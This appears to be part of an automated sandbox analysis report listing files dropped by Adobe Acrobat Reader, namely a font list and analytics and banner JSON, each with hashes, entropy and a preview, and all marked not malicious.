                                                                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x409..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426548852.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426548852.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:Type1.FontName:AdobePiStd.FamilyName:Adobe Pi Std.StyleName:Regular.FullName:Adobe Pi Std.MenuName:Adobe Pi Std.StyleBits:0.WritingScript:Roman.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf.DataFormat:sfntData.UsesStandardEncoding:yes.isCFF:yes.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.FileLength:85552.FileModTime:1627105154.WeightClass:400.WidthClass:5.Angle
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                          File Type:PostScript document text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10430
                                                                                                          Entropy (8bit):5.228466990239746
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:GfA2L6o9w6oBM76oXMx6o+U6ojy6o7k6o7F6oEV6o1Qfs6oMItRZ6oKKtsu6oQt4:GYEv9wvBGvXmv+Uvjyv7kv7FvEVv1QfW
                                                                                                          MD5:B386FAF194F67F59198EDFBE06CA8EF2
                                                                                                          SHA1:F2CCA6312436219871968A3EF67CA182C1C979FD
                                                                                                          SHA-256:47E64B5DDF842DCD9BCAB1FF9ADA5A9D827B10CFC1D80ED6D8554746B9127C92
                                                                                                          SHA-512:7367F8BFC2686EEFD00608B4A6FB5A4F529F3D937D9FC684D31545B8D7669A26C21DA1E2C222D50E1DA6AADD15A98994F31C4DDB238CEBB3F22B6BE87F306283
                                                                                                          Malicious:false
                                                                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x409..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426548852.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426548852.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:Type1.FontName:AdobePiStd.FamilyName:Adobe Pi Std.StyleName:Regular.FullName:Adobe Pi Std.MenuName:Adobe Pi Std.StyleBits:0.WritingScript:Roman.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf.DataFormat:sfntData.UsesStandardEncoding:yes.isCFF:yes.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.FileLength:85552.FileModTime:1627105154.WeightClass:400.WidthClass:5.Angle
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):295
                                                                                                          Entropy (8bit):5.350018569392435
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:YEQXJ2HXaTbJS7VRHhcgvEm0YA+ieoAvJM3g98kUwPeUkwRe9:YvXKXcIBRCVGMbLUkee9
                                                                                                          MD5:455090B38AC81740089BADE22207B514
                                                                                                          SHA1:43969030BF087F13354053606A08C6B62B9B47FA
                                                                                                          SHA-256:382F30B786CC0783D329034496AC2959B31576904E9D2B1630CED5D5949A06DA
                                                                                                          SHA-512:A7FD1CF8DD8A9006F440BD0AFBBFC32701E7A880BFFA743CAE4014217A90DDE4E11F34F40D703F6AE7FCEE739125BADB15BF386428DD40CBFB1D4327F9E491FA
                                                                                                          Malicious:false
                                                                                                          Preview:{"analyticsData":{"responseGUID":"159b34ec-65f2-4502-aff8-eb39914d373a","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1733042131210,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):294
                                                                                                          Entropy (8bit):5.296733623139668
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:YEQXJ2HXaTbJS7VRHhcgvEm0YA+ieoAvJfBoTfXpnrPeUkwRe9:YvXKXcIBRCVGWTfXcUkee9
                                                                                                          MD5:2C1BFE4EA2CD9FE9B653E4BA81BC6BE7
                                                                                                          SHA1:DF30CCC9CBC7697E1DB53159B2320AD9679DB491
                                                                                                          SHA-256:A3AF03D62993965EA0053A11367C73869067563973F2EABF6D09E8E85F7A4EDD
                                                                                                          SHA-512:2ACEB76289136D752C35423CF7FC28A26FC528ED85041EDE1BA03EAE5902CA1F5FA7868A118320A1F51D35B3BF2F31D3EFEDF355924A321F7DDA9FFF7A9B6D65
                                                                                                          Malicious:false
                                                                                                          Preview:{"analyticsData":{"responseGUID":"159b34ec-65f2-4502-aff8-eb39914d373a","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1733042131210,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):294
                                                                                                          Entropy (8bit):5.275728658534743
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:YEQXJ2HXaTbJS7VRHhcgvEm0YA+ieoAvJfBD2G6UpnrPeUkwRe9:YvXKXcIBRCVGR22cUkee9
                                                                                                          MD5:A271C4302E4DB738384003AE5D90A655
                                                                                                          SHA1:AB6A14EED2D2887EDF4F6C6E99BD432273F3BA8E
                                                                                                          SHA-256:FD19153D794C9C5923C69141FFFE095271A792B26DCC534FBE546788F0724119
                                                                                                          SHA-512:266BB7BFEA07FF513A0ADE46330D84FAE2F5EAA5842B38776B2EBF7C042B37FD57DF842482FAEBE72C1475794EE5AE06A921E5F71AFAFD78E4A4FF32D66511E1
                                                                                                          Malicious:false
                                                                                                          Preview:{"analyticsData":{"responseGUID":"159b34ec-65f2-4502-aff8-eb39914d373a","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1733042131210,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):285
                                                                                                          Entropy (8bit):5.325711145944651
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:YEQXJ2HXaTbJS7VRHhcgvEm0YA+ieoAvJfPmwrPeUkwRe9:YvXKXcIBRCVGH56Ukee9
                                                                                                          MD5:1BF25995BE6288B3E41DF006E9A066F4
                                                                                                          SHA1:5429A934B1E43B74033DD90A76CD848C9F474B32
                                                                                                          SHA-256:12F6B2FA73D202FA5AA16E7552FF5612FBB375745CBFE709533A1D5922AB59B5
                                                                                                          SHA-512:2A21A84C4B9668629A6A9B60E6CB044A55089254F208C421FE3C33BD2D6DC3EF22866AD1C5F8ACDFE5A1C66733E4E64921EF4F2D961F654790CDEBC62902556A
                                                                                                          Malicious:false
                                                                                                          Preview:{"analyticsData":{"responseGUID":"159b34ec-65f2-4502-aff8-eb39914d373a","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1733042131210,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1123
                                                                                                          Entropy (8bit):5.689889833331846
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:Yv6XcIBRbpLgE9cQx8LennAvzBvkn0RCmK8czOCCSQ:Yv+lhgy6SAFv5Ah8cv/Q
                                                                                                          MD5:0E1906F3C306780F31856BEE67039371
                                                                                                          SHA1:AF7A1EA7A5BEBEDF1452839BF6BBA65A70901B3D
                                                                                                          SHA-256:5B8130C1A8767293937FC5397E0C7BD19FF0136CE51C25AD858D18B909F01DA7
                                                                                                          SHA-512:35367FAC61D0D3F40FE88B6EECA43F9BD659F41A0940C997A7DE5D788E9ECE6B6728DC080B51EF2DE359D3053469F2F4F4246E1911BA9B99718A7FA5CC7F5B62
                                                                                                          Malicious:false
                                                                                                          Preview:{"analyticsData":{"responseGUID":"159b34ec-65f2-4502-aff8-eb39914d373a","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1733042131210,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1122
                                                                                                          Entropy (8bit):5.684309492176199
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:Yv6XcIBRXVLgEwcp06ybnAvz7xHn0RCmK8czOCYHfl8zdBh:Yv+pFgSNycJUAh8cvYHK
                                                                                                          MD5:695B22B0A9B488833C1C622035D4C3E1
                                                                                                          SHA1:EA2DC3A1676F24E515A84810F76B62104BD25628
                                                                                                          SHA-256:4D3D35408F2C5ACD6323F72395AAFAF9F2AFD04F2DC8A3AFB19E34E3AB286CD9
                                                                                                          SHA-512:18419F3CF241FC4FC417E1450ED651EA137D78786CC8E6B01D06CC2A5266B3791B49C5B76B7D2D7BB04CC0B96444ED7BC7910F2085EF45A743A4B9A041A0FAD1
                                                                                                          Malicious:false
                                                                                                          Preview:{"analyticsData":{"responseGUID":"159b34ec-65f2-4502-aff8-eb39914d373a","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1733042131210,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_0","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"1aad653c-ef44-43f7-be1c-3a2ba2cf2cfc","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuIFBERiBmb3JtcyAmIGFncmVlbWVudHMuIn0sInRjY
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):292
                                                                                                          Entropy (8bit):5.286103553244493
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:YEQXJ2HXaTbJS7VRHhcgvEm0YA+ieoAvJfQ1rPeUkwRe9:YvXKXcIBRCVGY16Ukee9
                                                                                                          MD5:49A01FBE04A7C70A0798BAC190269FE5
                                                                                                          SHA1:B070AC91C7F18EC39A9734D43995006613BB0C71
                                                                                                          SHA-256:5E704DC776FE1400A7F9539B0E0FC329280DFC4443D1285EA73E1682DCC15285
                                                                                                          SHA-512:2092ADA0C1C81CD0A4C3FF3430F897827EA7B345A0A20E1DE5909175198DD891B9DCCBD82B42FA181F68D0646429E770898401A79BE4C401BE83937EEDB3B759
                                                                                                          Malicious:false
                                                                                                          Preview:{"analyticsData":{"responseGUID":"159b34ec-65f2-4502-aff8-eb39914d373a","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1733042131210,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1102
                                                                                                          Entropy (8bit):5.674862045114131
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:Yv6XcIBRG2LgErcXWl7y0nAvzIBcSJCBViVh:Yv+YogH47yfkB5kVQ
                                                                                                          MD5:10B61ECB8B9A4291D1E072EEF9D2A18F
                                                                                                          SHA1:450CFD9B92D21EF080412C8E08671847873FB53D
                                                                                                          SHA-256:F92FBB4CC0818A3466BDEE013F6AEFCC883CD7333AB657C32A4ED933508E3798
                                                                                                          SHA-512:450275693FC429D4E33D6FC3DAD21BAE563562C37CDCB42DAB0B722EF72AB5BC5D041B779A8E0B384A85ECF5168134F2F14E1A28C4FE2754ABE9C0DB9C9FFF5E
                                                                                                          Malicious:false
                                                                                                          Preview:{"analyticsData":{"responseGUID":"159b34ec-65f2-4502-aff8-eb39914d373a","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1733042131210,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_1","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"533ab5eb-b236-4889-89a5-ac002261d71e","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkVkaXRQREZSZHJBcHBGdWxsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTRweCIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTJweCIsImZvbnRfc3R5bGUiOiItMSJ9LCJ0aXRsZSI6bnVsbCwiZGVzY3JpcHRpb24iOiJFZGl0IHRleHQsIGltYWdlcywgcGFnZXMsIGFuZCBtb3JlLiJ9LCJ0Y2F0SWQiOm51bGx9","da
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):289
                                                                                                          Entropy (8bit):5.30092455965125
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:YEQXJ2HXaTbJS7VRHhcgvEm0YA+ieoAvJfYdPeUkwRe9:YvXKXcIBRCVGg8Ukee9
                                                                                                          MD5:D5D3C06583AA99002121BEAB7DD8778C
                                                                                                          SHA1:CF0DBD962D4366DA65E48391D5451A459D1DABDD
                                                                                                          SHA-256:5DDBB03CC78CA218BD1D2FF2B15BA9307AE0B47E66545FABFDF473660C54DD43
                                                                                                          SHA-512:E66987A1EC7D14DBEEC79E2751B95AAD8F6F83E02D9D7D6E30CB6276EB2C10D685F45FFD18A08847D61A6E2359D9AA0D26D14D8BED37557B8ED3053D5FBF2FCD
                                                                                                          Malicious:false
                                                                                                          Preview:{"analyticsData":{"responseGUID":"159b34ec-65f2-4502-aff8-eb39914d373a","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1733042131210,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):284
                                                                                                          Entropy (8bit):5.287290200860413
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:YEQXJ2HXaTbJS7VRHhcgvEm0YA+ieoAvJf+dPeUkwRe9:YvXKXcIBRCVG28Ukee9
                                                                                                          MD5:5E445CF6BA8E5571019379A61FD228F3
                                                                                                          SHA1:41D7197090D29C5C8A7832FA0E37B4926691DB3D
                                                                                                          SHA-256:AAE1CB2DA892CB8BADE58E9350C9A76C2D320905662EA702D3573D435A7EA1D6
                                                                                                          SHA-512:2476534B91C458D9285958220667C19BF19CC2CD07E955243E269D3DD7B95FBF8A14C2D18A057EE5A0F90F98A6AABC81E195EB1D4C2A2CA1EB1052681811C7C6
                                                                                                          Malicious:false
                                                                                                          Preview:{"analyticsData":{"responseGUID":"159b34ec-65f2-4502-aff8-eb39914d373a","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1733042131210,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):291
                                                                                                          Entropy (8bit):5.284465302963249
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:YEQXJ2HXaTbJS7VRHhcgvEm0YA+ieoAvJfbPtdPeUkwRe9:YvXKXcIBRCVGDV8Ukee9
                                                                                                          MD5:F17E3114D903310B0FCE1C0590FF40BB
                                                                                                          SHA1:D4FA533C771E1C9CB2AAA9FCB9971FFC732CD357
                                                                                                          SHA-256:0020379D5314C7EB4B198E1BE7EC7D2CC0893A4930DC324365EA063C55DE2796
                                                                                                          SHA-512:45A590EA07DAB43EF9D8C353623F89A04636C4DD18B34B3AF16A63A30CE4466EB3F67BB460064B84E55B8CBC2DBF5CFE8567C2CF782D98E9EFC7ADA3712002C7
                                                                                                          Malicious:false
                                                                                                          Preview:{"analyticsData":{"responseGUID":"159b34ec-65f2-4502-aff8-eb39914d373a","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1733042131210,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):287
                                                                                                          Entropy (8bit):5.276552408375505
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:YEQXJ2HXaTbJS7VRHhcgvEm0YA+ieoAvJf21rPeUkwRe9:YvXKXcIBRCVG+16Ukee9
                                                                                                          MD5:9A567B112F83A233B3CE98EAE1B61C11
                                                                                                          SHA1:3E275B84E9B90E9A61463FFA961278DD4A1DE811
                                                                                                          SHA-256:A724A0484620D6F46EF074F82555D00E527BAAA55E3DAFF3BC928CFB2366DA4B
                                                                                                          SHA-512:7CD726320F46EA481C65D01EC92F7979B610D994D28FB76B74DB8514DFFE4432448661404E10E05AF6D35421FBADF5637E5EABD49CD13E13C48885F581D2A32A
                                                                                                          Malicious:false
                                                                                                          Preview:{"analyticsData":{"responseGUID":"159b34ec-65f2-4502-aff8-eb39914d373a","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1733042131210,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1090
                                                                                                          Entropy (8bit):5.665457514068734
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:Yv6XcIBRbamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSQ:Yv+RBgkDMUJUAh8cvMQ
                                                                                                          MD5:A191B65FFF964903843E899AA28E3346
                                                                                                          SHA1:E7F439DF0CB1A357EC7285DCA315EA695DD71179
                                                                                                          SHA-256:8A8969BC3478FF0E0F00D7E4EAE911D4DCAEF386CD9879CCBA39A41364238859
                                                                                                          SHA-512:D80F918D3A93C7F95C9A32A87D026239A39E01F856DA424201D2F9D41BF6FE87766C0346C368F89F3AD6E6CB15E8A2003426932377027AA365475982F2B65617
                                                                                                          Malicious:false
                                                                                                          Preview:{"analyticsData":{"responseGUID":"159b34ec-65f2-4502-aff8-eb39914d373a","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1733042131210,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):286
                                                                                                          Entropy (8bit):5.2521530335800355
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:YEQXJ2HXaTbJS7VRHhcgvEm0YA+ieoAvJfshHHrPeUkwRe9:YvXKXcIBRCVGUUUkee9
                                                                                                          MD5:857176750BE25BF9A7086B10DB7C6545
                                                                                                          SHA1:D587BE1B2B7728235B9D896C6BBED72031E4848B
                                                                                                          SHA-256:7A18BB922EF90C04DA9D446D5F779CAE3D8730C55F68A7C237C9112B34AB1723
                                                                                                          SHA-512:1E1FF740AE7BECA99DEF702178BBB1061EAC13E574BCA9ACEB98391D85F0268FED26A002E874AB57AD378F8B22222CD5365D99AB9ABCB36F6C9425527991322B
                                                                                                          Malicious:false
                                                                                                          Preview:{"analyticsData":{"responseGUID":"159b34ec-65f2-4502-aff8-eb39914d373a","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1733042131210,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):282
                                                                                                          Entropy (8bit):5.2557026581939255
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:YEQXJ2HXaTbJS7VRHhcgvEm0YA+ieoAvJTqgFCrPeUkwRe9:YvXKXcIBRCVGTq16Ukee9
                                                                                                          MD5:993381E7057A0E87EDB20A19F5050319
                                                                                                          SHA1:31934C0B2F492F4D0B77C07CA5F91C5C165B8230
                                                                                                          SHA-256:0AF04D7F68185E788A92C78F066E04301BA1B22429A58CEB3B0B1DFC77F35053
                                                                                                          SHA-512:0484689F02D49BAF6631BFE2DC04B65509BAFEAA343DD834BC708B90BEED7B7D23FB003381E324A58C91895583DDE504110518996D516996B5E29791F947E9E3
                                                                                                          Malicious:false
                                                                                                          Preview:{"analyticsData":{"responseGUID":"159b34ec-65f2-4502-aff8-eb39914d373a","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1733042131210,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4
                                                                                                          Entropy (8bit):0.8112781244591328
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:e:e
                                                                                                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                          Malicious:false
                                                                                                          Preview:....
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2638
                                                                                                          Entropy (8bit):5.137659948142558
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:YUvvJaeWay2/9ZQxs8E6lAJoUj+j0Soss2J2LSyCWcAZMXbg3TgSnO5em9wzfulb:Yuf2sfYWxgaA4lZMX8jrOv9wzcb
                                                                                                          MD5:4CAE07AEEA0684DB13DF9CA527408FE0
                                                                                                          SHA1:61D920F240140966BF3A375993EA69385197F0F6
                                                                                                          SHA-256:BE2DF7D77558F010576F5A77B41C94D53F185B06F1978C372BDCA66BBF09D8AE
                                                                                                          SHA-512:6A89221005EF377E0F80F134068799E88FF798E77334E8601162E54E4B9C9C5502BDFF3D7D9E1DCA7F8EE517F36A17EC0740C8254F748D78E3D1B94C0147030E
                                                                                                          Malicious:false
